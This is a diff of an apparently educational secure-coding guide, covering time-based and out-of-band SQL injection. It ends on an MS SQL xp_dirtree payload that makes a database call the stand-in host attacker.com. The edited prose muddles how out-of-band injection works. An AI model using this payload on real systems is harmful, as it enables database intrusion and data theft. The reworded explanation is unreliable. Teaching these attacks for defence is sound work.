satiracode/owasp-junior-appsec/Secure Coding Principles ENG.md

 The whole point of the attack is to monitor the server response time.
 If there are delays in the response (in our case around 10 seconds), it means that the application is vulnerable to SQL Injection and the attack can be launched.

 **Out-of-Bound SQL Injection**
-This is a rather heavy type of SQL injection and its success depends heavily on the configuration of the target server.
+This is a more tedious SQL injection attack that relies on asyncronous database entries and its success depends heavily on the configuration of the target server.
 As an example, let's imagine that our target is using Microsoft SQL Server.

-Let's imagine our bad fella runs their server on `attacker.com`.
-Their goal is to intercept all incoming DNS requests that are sent to their server, which is the **server vulnerability identifier**.
+The attacker runs their server on `attacker.com` with the goal of intercepting all incoming DNS requests to the target and routing them to the attacker's server, which is the **server vulnerability identifier**.

-After that, he sends the following payload:
+After that, they send the following payload:

 ```sql
 '; EXEC master..xp_dirtree '//attacker.com/sample'--.